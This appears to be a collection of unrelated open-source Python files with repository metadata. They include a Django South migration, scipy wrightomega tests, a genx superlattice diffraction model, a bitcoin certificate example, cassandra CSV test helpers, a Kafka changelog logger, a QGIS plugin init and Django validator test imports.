db.add_column('core_category', 'content', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Adding field 'Category.template'
db.add_column('core_category', 'template', self.gf('django.db.models.fields.CharField')(default='category.html', max_length=100), keep_default=False)
def backwards(self, orm):
# Deleting field 'Category.content'
db.delete_column('core_category', 'content')
# Deleting field 'Category.template'
db.delete_column('core_category', 'template')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.author': {
'Meta': {'object_name': 'Author'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.category': {
'Meta': {'unique_together': "(('site', 'tree_path'),)", 'object_name': 'Category'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']", 'null': 'True', 'blank': 'True'}),
'tree_path': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.dependency': {
'Meta': {'object_name': 'Dependency'},
'dependent_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'depends_on_set'", 'to': "orm['contenttypes.ContentType']"}),
'dependent_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'target_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dependency_for_set'", 'to': "orm['contenttypes.ContentType']"}),
'target_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.listing': {
'Meta': {'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']"}),
'commercial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"})
},
'core.publishable': {
'Meta': {'object_name': 'Publishable'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['core.Author']", 'symmetrical': 'False'}),
'category': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['core.Category']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['photos.Photo']", 'null': 'True', 'blank': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(3000, 1, 1, 0, 0, 0, 2)', 'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Source']", 'null': 'True', 'blank': 'True'}),
'static': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.related': {
'Meta': {'object_name': 'Related'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"}),
'related_ct': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'related_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.source': {
'Meta': {'object_name': 'Source'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'photos.photo': {
'Meta': {'object_name': 'Photo'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'photo_set'", 'symmetrical': 'False', 'to': "orm['core.Author']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'height': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'important_bottom': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_left': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_right': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_top': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Source']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['core']
|
petrlosa/ella
|
ella/core/south_migrations/0005_auto__add_field_category_content__add_field_category_template.py
|
Python
|
bsd-3-clause
| 11,864 | 0.008092 |
from __future__ import division, print_function, absolute_import
import pytest
import numpy as np
from numpy.testing import assert_, assert_equal, assert_allclose
import scipy.special as sc
from scipy.special._testutils import assert_func_equal
def test_wrightomega_nan():
pts = [complex(np.nan, 0),
complex(0, np.nan),
complex(np.nan, np.nan),
complex(np.nan, 1),
complex(1, np.nan)]
for p in pts:
res = sc.wrightomega(p)
assert_(np.isnan(res.real))
assert_(np.isnan(res.imag))
def test_wrightomega_inf_branch():
pts = [complex(-np.inf, np.pi/4),
complex(-np.inf, -np.pi/4),
complex(-np.inf, 3*np.pi/4),
complex(-np.inf, -3*np.pi/4)]
expected_results = [complex(0.0, 0.0),
complex(0.0, -0.0),
complex(-0.0, 0.0),
complex(-0.0, -0.0)]
for p, expected in zip(pts, expected_results):
res = sc.wrightomega(p)
# We can't use assert_equal(res, expected) because in older versions of
# numpy, assert_equal doesn't check the sign of the real and imaginary
# parts when comparing complex zeros. It does check the sign when the
# arguments are *real* scalars.
assert_equal(res.real, expected.real)
assert_equal(res.imag, expected.imag)
def test_wrightomega_inf():
pts = [complex(np.inf, 10),
complex(-np.inf, 10),
complex(10, np.inf),
complex(10, -np.inf)]
for p in pts:
assert_equal(sc.wrightomega(p), p)
def test_wrightomega_singular():
pts = [complex(-1.0, np.pi),
complex(-1.0, -np.pi)]
for p in pts:
res = sc.wrightomega(p)
assert_equal(res, -1.0)
assert_(np.signbit(res.imag) == False)
@pytest.mark.parametrize('x, desired', [
(-np.inf, 0),
(np.inf, np.inf),
])
def test_wrightomega_real_infinities(x, desired):
assert sc.wrightomega(x) == desired
def test_wrightomega_real_nan():
assert np.isnan(sc.wrightomega(np.nan))
def test_wrightomega_real_series_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = 1e20
x_before_crossover = np.nextafter(crossover, -np.inf)
x_after_crossover = np.nextafter(crossover, np.inf)
# Computed using Mpmath
desired_before_crossover = 99999999999999983569.948
desired_after_crossover = 100000000000000016337.948
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_exp_approximation_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = -50
x_before_crossover = np.nextafter(crossover, np.inf)
x_after_crossover = np.nextafter(crossover, -np.inf)
# Computed using Mpmath
desired_before_crossover = 1.9287498479639314876e-22
desired_after_crossover = 1.9287498479639040784e-22
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_real_versus_complex():
x = np.linspace(-500, 500, 1001)
results = sc.wrightomega(x + 0j).real
assert_func_equal(sc.wrightomega, results, x, atol=0, rtol=1e-14)
|
jamestwebber/scipy
|
scipy/special/tests/test_wrightomega.py
|
Python
|
bsd-3-clause
| 3,616 | 0.000277 |
'''<h1>Library for surface x-ray diffraction simulations of superlattices</h1>
<p> The model is based on Fullertons algorithm for superlattices as
described in Phys. Rev. B vol. 45 p. 9292 (1992).
'''
# Programmed by Matts Bjorck 20091215
import numpy as np
import genx.models.sxrd
from genx.models.utils import f, rho
import time
from genx.models.sxrd import UnitCell, AtomGroup, Instrument, Slab, SymTrans
__pars__ = ['SLSample', 'SLStandard', 'UnitCell', 'Slab', 'AtomGroup',
'Instrument']
class SLSample:
'''Class that models a multilayer sample on top of a
substrate according to Fullertons model as given in
PRB ....
'''
def __init__(self, inst, bulk_slab, superlattice, unitcell,
bulk_sym = []):
self.set_bulk_slab(bulk_slab)
self.set_bulk_sym(bulk_sym)
self.superlattice = superlattice
self.inst = inst
self.set_unit_cell(unitcell)
def set_bulk_slab(self, bulk_slab):
'''Set the bulk unit cell to bulk_slab
'''
if not isinstance(bulk_slab, type(genx.models.sxrd.Slab())):
raise TypeError("The bulk slab has to be a member of"
" class Slab")
self.bulk = bulk_slab
def set_unit_cell(self, unit_cell):
'''Sets the unitcell of the sample
'''
if not isinstance(unit_cell, type(genx.models.sxrd.UnitCell(1.0, 1.0, 1.0))):
raise TypeError("The bulk slab has to be a member"
" of class UnitCell")
if unit_cell == None:
unit_cell = genx.models.sxrd.UnitCell(1.0, 1,.0, 1.0)
self.unit_cell = unit_cell
def set_bulk_sym(self, sym_list):
'''Sets the list of allowed symmetry operations for the bulk
sym_list has to be a list ([]) of symmetry elements from the
class SymTrans
'''
# Type checking
if not isinstance(sym_list, type([])):
raise TypeError("The surface symmetries has to contained"
" in a list")
if sym_list == []:
sym_list = [genx.models.sxrd.SymTrans()]
if min([isinstance(sym, type(genx.models.sxrd.SymTrans())) for
sym in sym_list]) == 0:
raise TypeError("All members in the symmetry list has to"
" be a memeber of class SymTrans")
self.bulk_sym = sym_list
def calc_i(self, h, k, l):
'''Calculate the diffracted intensity from a superlattice.
The diffracted intensity from the superlattice and the substrate
are added. I.e. it is assumed that the films is not coherent with
the substrate.
'''
bulk_i = np.abs(self.calc_fb(h, k, l))**2
sl_i = np.abs(self.superlattice.calc_i(h, k, l))
return (bulk_i + sl_i)*self.inst.inten
def calc_fb(self, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, el, u, oc, c = self.bulk._extract_values()
oc = oc/float(len(self.bulk_sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Calculate the "shape factor" for the CTRs
eff_thick = self.unit_cell.c/np.sin(self.inst.alpha*np.pi/180.0)
alpha = (2.82e-5*self.inst.wavel*eff_thick/self.unit_cell.vol()*
np.sum(f.imag,1))
denom = np.exp(2.0*np.pi*1.0J*l)*np.exp(-alpha) - 1.0
# Delta functions to remove finite size effect in hk plane
delta_funcs=(abs(h - np.round(h)) < 1e-12)*(
abs(k - np.round(k)) < 1e-12)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in self.bulk_sym], 0)
,1)
# Putting it all togheter
fb = f_u/denom*delta_funcs
return fb
class Superlattice:
'''Class that describe a superlattice, can be subclassed
to implement different strain profiles, interdiffusion etc..
'''
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
self.a_slab = a_slab
self.b_slab = b_slab
if a_sym == []:
self.a_sym = [genx.models.sxrd.SymTrans()]
else:
self.a_sym = a_sym
if b_sym == []:
self.b_sym = [genx.models.sxrd.SymTrans()]
else:
self.b_sym = b_sym
self.unit_cell = unit_cell
self.inst = inst
def _extract_slab_values(self, slabs, sym):
'''Extracts the necessary parameters for simulating
a list of stacked slabs
'''
# Extract the parameters we need
# the star in zip(*... transform the list elements to arguments
xt, yt, zt, elt, ut, oct, ct = list(zip(*[slab._extract_values()
for slab in slabs]))
x = np. r_[xt]
y = np.r_[yt]
# scale and shift the slabs with respect to each other
cn = np.cumsum(np.r_[0, ct])[:-1]
z = np.concatenate([zs*c_s + c_cum
for zs, c_cum, c_s in zip(zt, cn, ct)])
#el = reduce(lambda x,y:x+y, elt)
el = np.r_[elt]
u = np.r_[ut]
oc = np.r_[oct]
#print x,y,z, u
t_lay = sum(ct)
return x, y, z, u, oc, el, t_lay
def calc_fslab(self, slablist, sym, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, u, oc, el, t_lay = self._extract_slab_values(slablist,
sym)
oc = oc/float(len(sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in sym], 0)
,1)
#return f_u, (z.max() - z.min())*np.ones(l.shape)
return f_u, t_lay*np.ones(l.shape)
def calc_fa(self, n, h, k, l):
'''Calculate the strucutre factor for a a layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fb(self, n, h, k, l):
'''Calcualte the structure factor for a b layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fsl(self, unit_cell, h, k, l):
'''Calculate the strucutre factor for the entire
superlattice.
'''
raise NotImplementedError('calc_fsl has to be implemented in '
'a Superlattices subclass')
class SLStandard(Superlattice):
'''Class that implements a "standard" superlattice, no strain
included.
'''
_pars = {'sigmaa': 1e-12, 'sigmab':1e-12, 'repetitions':2, 'na':2,
'nb': 2,'a': 0.0, 'c':1e-12}
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
Superlattice.__init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = a_sym, b_sym = b_sym)
[self._make_set_func(name, self._pars[name]) for name in
list(self._pars.keys())]
[self._make_get_func(name) for name in list(self._pars.keys())]
def calc_fa(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.a_slab]*n, self.a_sym,
h, k, l)
return f_slab, t_z
def calc_fb(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.b_slab]*n, self.b_sym,
h, k, l)
return f_slab, t_z
def thick_prob(self, n_mean, stand_dev):
# According to fullerton it's enough to include three
# standard deviations in the averaging
lower = np.floor(n_mean-3.0*stand_dev)
lower = np.int(min(lower, n_mean - 1))
# We can't have a negative thickness, altough we remove
# the gaussian distribution How does this affect the theoretical
# assumptions?
if lower < 1:
lower = 1
upper = np.ceil(n_mean + 3.0*stand_dev)
n = np.arange(lower,
np.int(max(upper, n_mean + 1) + 1))
#print 'n: ', n
prob = np.exp(-(n - n_mean)**2/2.0/stand_dev**2)
prob = prob/sum(prob)
return n, prob
def calc_i(self, h, k, l):
''' Function to calculate the form factor from a superlattice
'''
# Create the different thicknesses to avarage over
na, pa = self.thick_prob(self.na, self.sigmaa)
nb, pb = self.thick_prob(self.nb, self.sigmab)
tmp = np.array([self.calc_fa(n, h, k, l) for n in na])
fa = tmp[:, 0, :]
ta = tmp[:, 1, :]
tmp = np.array([self.calc_fb(n, h, k, l) for n in nb])
fb = tmp[:, 0, :]
tb = tmp[:, 1, :]
#print pa.shape, fa.shape
pa = pa[:, np.newaxis]
pb = pb[:, np.newaxis]
# Do the different averagning
fafa = (pa*fa*fa.conj()).sum(0)
fbfb = (pb*fb*fb.conj()).sum(0)
fam = (pa*fa).sum(0)
fbm = (pb*fb).sum(0)
phia = (pa*np.exp(2*np.pi*1.0J*ta*l)*fa.conj()).sum(0)
phib = (pb*np.exp(2*np.pi*1.0J*tb*l)*fb.conj()).sum(0)
ta = (pa*np.exp(2*np.pi*1.0J*ta*l)).sum(0)
tb = (pb*np.exp(2*np.pi*1.0J*tb*l)).sum(0)
m = self.repetitions
ksi = 2*np.pi*1.0J*l*self.a - (2*np.pi*l*self.c)**2/2.
# Calculate the intensity
int = (m*(fafa + 2.0*np.real(np.exp(ksi)*phia*fbm) + fbfb) +
2.0*np.real((np.exp(-ksi)*phib*fam/ta/tb + phia*fam/ta +
phib*fbm/tb + np.exp(ksi)*phia*fbm)*(
(m - (m + 1)*np.exp(2.0*ksi)*ta*tb +
(np.exp(2.0*ksi)*ta*tb)**(m + 1))/
(1 - np.exp(2.0*ksi)*ta*tb)**2 - m)))
return int
def _make_set_func(self, name, val):
'''Creates a function to set value for attribute with name'''
def set_func(value):
setattr(self, name, value)
# Init the variable
set_func(val)
setattr(self, 'set' + name, set_func)
def _make_get_func(self, name):
''' Creates a get function '''
def get_func():
return getattr(self, name)
setattr(self, 'get' + name, get_func)
if __name__ == '__main__':
from pylab import *
inst = genx.models.sxrd.Instrument(wavel = 0.77, alpha = 0.2)
inst.set_inten(100.0)
lay_a = genx.models.sxrd.Slab()
lay_a.add_atom('Sr', 'sr', 0.0, 0.0, 0.0, 0.001, 1.0)
lay_a.add_atom('Ti', 'ti', 0.5, 0.5, 0.5, 0.001, 1.0)
lay_a.add_atom('O1', 'o', 0.5, 0.0, 0.5, 0.001, 1.0)
lay_a.add_atom('O2', 'o', 0.0, 0.5, 0.5, 0.001, 1.0)
lay_a.add_atom('O3', 'o', 0.5, 0.5, 0.0, 0.001, 1.0)
lay_b = genx.models.sxrd.Slab(c = 1.0)
lay_b.add_atom('La', 'la', 0.0, 0.0, 0.0, 0.001, 1.0, 1.0)
lay_b.add_atom('Al', 'al', 0.5, 0.5, 0.5, 0.001, 1.0, 1.0)
lay_b.add_atom('O1', 'o', 0.5, 0.5, 0.0, 0.001, 1.0, 1.)
lay_b.add_atom('O2', 'o', 0.0, 0.5, 0.5, 0.001, 1.0, 1.)
lay_b.add_atom('O3', 'o', 0.5, 0.0, 0.5, 0.001, 1.0, 1.)
uc = genx.models.sxrd.UnitCell(3.945, 3.945, 3.945, 90, 90, 90)
sl = SLStandard(inst, uc, lay_b, lay_a)
sl_sample = SLSample(inst, lay_a, sl, uc)
sl.seta(0.0)
sl.setc(0.00001)
sl.setna(4.0)
# Seems to have a lower limit of about 0.3 UC to work fine
# with the calculation of thicknesses..
sl.setsigmaa(0.3)
sl.setnb(2.0)
sl.setsigmab(0.3)
sl.setrepetitions(10)
l = np.arange(0.1, 3, 0.0011)
h = 0.0*np.ones(l.shape)
k = 0.0*np.ones(l.shape)
int = sl_sample.calc_i(h, k, l)
sample = genx.models.sxrd.Sample(inst, lay_a, ([lay_b]*4 + [lay_a]*2)*10,
genx.models.sxrd.UnitCell(3.945, 3.945, 3.945, 90, 90, 90))
f_ref = sample.calc_f(h,k,l)
int_ref = abs(f_ref)**2
# Comparison between the normal sxrd model and the superlattice model.
semilogy(l, int_ref)
semilogy(l, int)
legend(('sxrd model', 'sxrd_mult closed form'))
xlabel('l [r.l.u.]')
ylabel('Intensity')
show()
|
haozhangphd/genx-py3
|
genx/models/sxrd_mult.py
|
Python
|
gpl-3.0
| 12,753 | 0.008469 |
#!/usr/bin/python
import sys
sys.path.append('..')
from bcert_pb2 import *
import binascii
# fill out a minimal bitcoin cert
cert = BitcoinCert()
# first the data part (the part is later signed by the "higher level cert" or "the blockchain")
cert.data.version = '0.1'
cert.data.subjectname = 'Foo Inc.'
email = cert.data.contacts.add()
email.type = email.EMAIL
email.value = 'foo@fooinc.com'
url = cert.data.contacts.add()
url.type = url.URL
url.value = 'http://www.fooinc.com'
paykey = cert.data.paymentkeys.add()
paykey.usage = paykey.PAYMENT
paykey.algorithm.type = paykey.algorithm.STATIC_BTCADDR # is default anyway
key = paykey.value.append("mrMyF68x19kAc2byGKqR9MLfdAe1t5MPzh")
#key = paykey.value.append("0211b60f23135a806aff2c8f0fbbe620c16ba05a9ca4772735c08a16407f185b34".decode('hex'))
# this is standard in bitcoin ripemd(sha256())
from bitcoin import hash_160
# add signature to cert
#sig = cert.signatures.add()
#sig.algorithm.type = sig.algorithm.BCPKI
#sig.algorithm.version = "0.3"
#sig.value = "foo1" # for signatures of type BCPKI the alias IS the value,
# other types place the signature of BitcoinCertDataToHash(certData) here,
# for BCPKI this hash appears in the blockchain instead
# see how the cert looks
print cert
# serialize it
def CertToAscii(cert):
ser = cert.SerializeToString()
crc = binascii.crc32(ser) & 0xffffff # keep only last 24 bit (should use CRC-24 like OpenPGP)
# OpenPGP uses initializations for its crc-24, see http://tools.ietf.org/html/rfc2440
asc = binascii.b2a_base64(cert.SerializeToString())[:-1] # without trailing newline
asc += '=' # checksum is seperated by =
asc += binascii.b2a_base64(('%06x'%crc).decode('hex'))
return asc
def CertToAsciiMsg(cert):
ver = cert.version
asc = CertToAscii(cert)
res = '-----BEGIN BTCPKI CERTIFICATE-----\n'
res += 'Version: '+cert.version+'\n\n'
res += '\n'.join(asc[i:i+72] for i in xrange(0, len(asc), 72))
res += '-----END BTCPKI CERTIFICATE-----\n'
return res
# TODO: AsciiToCert
from e import derivepubkey
#print "deriving filename from: "+normalized
#fname = id+'.bcrt'
fname = 'foo1_static.bcrt'
f=open(fname,'wb')
f.write(cert.SerializeToString())
f.close()
print "binary cert written to: "+fname
#fname = id+'.acrt'
#f=open(fname,'wb')
#f.write(CertToAscii(cert))
#f.close()
#print "ascii cert written to: "+fname
#fname = 'my.data'
#f=open(fname,'wb')
#f.write(cert.data.SerializeToString())
#f.close()
#print "binary data part written to: "+fname
# see the hash
print "hash of data part is: "+hash_160(cert.data.SerializeToString()).encode('hex')
print "hex binary cert: "+cert.SerializeToString().encode('hex')
#print CertToAscii(cert)
#print CertToAsciiMsg(cert)
# OLD
#from subprocess import Popen,PIPE,check_call,call
#p = Popen(['./bitcoind','-testnet','registeralias','foo3','0.5',hash],stdout=PIPE)
#result = p.stdout.read()
#print result
|
bcpki/bitcoin
|
src/bcert/examples/mk_foo1_static.py
|
Python
|
mit
| 2,934 | 0.023177 |
import csv
import random
import cassandra
from nose.tools import assert_items_equal
class DummyColorMap(object):
def __getitem__(self, *args):
return ''
def csv_rows(filename, delimiter=None):
"""
Given a filename, opens a csv file and yields it line by line.
"""
reader_opts = {}
if delimiter is not None:
reader_opts['delimiter'] = delimiter
with open(filename, 'rb') as csvfile:
for row in csv.reader(csvfile, **reader_opts):
yield row
def assert_csvs_items_equal(filename1, filename2):
with open(filename1, 'r') as x, open(filename2, 'r') as y:
assert_items_equal(list(x.readlines()), list(y.readlines()))
def random_list(gen=None, n=None):
if gen is None:
def gen():
return random.randint(-1000, 1000)
if n is None:
def length():
return random.randint(1, 5)
else:
def length():
return n
return [gen() for _ in range(length())]
def write_rows_to_csv(filename, data):
with open(filename, 'wb') as csvfile:
writer = csv.writer(csvfile)
for row in data:
writer.writerow(row)
csvfile.close
def monkeypatch_driver():
"""
Monkeypatches the `cassandra` driver module in the same way
that clqsh does. Returns a dictionary containing the original values of
the monkeypatched names.
"""
cache = {'deserialize': cassandra.cqltypes.BytesType.deserialize,
'support_empty_values': cassandra.cqltypes.CassandraType.support_empty_values}
cassandra.cqltypes.BytesType.deserialize = staticmethod(lambda byts, protocol_version: bytearray(byts))
cassandra.cqltypes.CassandraType.support_empty_values = True
return cache
def unmonkeypatch_driver(cache):
"""
Given a dictionary that was used to cache parts of `cassandra` for
monkeypatching, restore those values to the `cassandra` module.
"""
cassandra.cqltypes.BytesType.deserialize = staticmethod(cache['deserialize'])
cassandra.cqltypes.CassandraType.support_empty_values = cache['support_empty_values']
|
carlyeks/cassandra-dtest
|
cqlsh_tests/cqlsh_tools.py
|
Python
|
apache-2.0
| 2,124 | 0.001883 |
class StoreChangeLogger:
def __init__(self, store_name, context) -> None:
self.topic = f'{context.application_id}-{store_name}-changelog'
self.context = context
self.partition = context.task_id.partition
self.record_collector = context.state_record_collector
def log_change(self, key: bytes, value: bytes) -> None:
if self.record_collector:
self.record_collector.send(self.topic, key, value, self.context.timestamp, partition=self.partition)
|
wintoncode/winton-kafka-streams
|
winton_kafka_streams/state/logging/store_change_logger.py
|
Python
|
apache-2.0
| 503 | 0.001988 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeobricksTRMM
A QGIS plugin
Download TRMM daily data.
-------------------
begin : 2015-10-06
copyright : (C) 2015 by Geobricks
email : info@geobricks.org
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load GeobricksTRMM class from file GeobricksTRMM.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .geobricks_trmm_qgis import GeobricksTRMM
return GeobricksTRMM(iface)
|
geobricks/geobricks_qgis_plugin_trmm
|
__init__.py
|
Python
|
gpl-2.0
| 1,510 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime, timedelta
import re
import types
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.validators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
validate_comma_separated_integer_list, validate_email, validate_integer,
validate_ipv46_address, validate_ipv4_address, validate_ipv6_address,
validate_slug,
)
from django.test.utils import str_prefix
